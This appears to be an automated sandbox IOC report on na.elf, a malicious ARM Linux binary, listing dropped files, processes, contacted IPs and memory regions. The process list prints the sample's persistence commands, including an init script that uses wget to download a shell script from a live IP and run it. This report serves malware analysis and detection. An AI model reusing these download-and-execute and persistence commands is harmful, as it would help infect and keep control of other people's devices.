IOC Report
na.elf

loading gif

Files

File Path
Type
Category
Malicious
na.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/na.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.d1Mlmt (deleted)
data
dropped

Processes

Path
Cmdline
Malicious
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
/tmp/na.elf
/tmp/na.elf
/tmp/na.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/na.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/na.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/na.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/na.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting na.elf'\n /tmp/na.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping na.elf'\n killall na.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/na.elf"
/tmp/na.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/na.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/na.elf
/tmp/na.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/na.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf
/tmp/na.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 28 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://154.216.19.140/
unknown

IPs

IP
Domain
Country
Malicious
154.216.19.139
unknown
Seychelles
87.120.84.105
unknown
Bulgaria
185.170.144.84
unknown
unknown
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
193.143.1.59
unknown
unknown
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
55ac09cee000
page read and write
7f305c039000
page read and write
7f3161f0d000
page read and write
7f316284b000
page read and write
55ac07cd0000
page read and write
55ac09cd7000
page execute and read and write
7f3162a2c000
page read and write
7f305c02c000
page execute read
7ffe59879000
page read and write
7f3161e7b000
page read and write
7f3162b79000
page read and write
7f3162669000
page read and write
7f315bfff000
page read and write
7ffe598a5000
page execute read
7f3162b55000
page read and write
7f315c021000
page read and write
55ac07a7f000
page execute read
7f305c035000
page read and write
7f3162bbe000
page read and write
7f31624fd000
page read and write
7f3161673000
page read and write
7f31624da000
page read and write
55ac0a8a1000
page read and write
7f316226f000
page read and write
55ac07cd9000
page read and write
There are 15 hidden memdumps, click here to show them.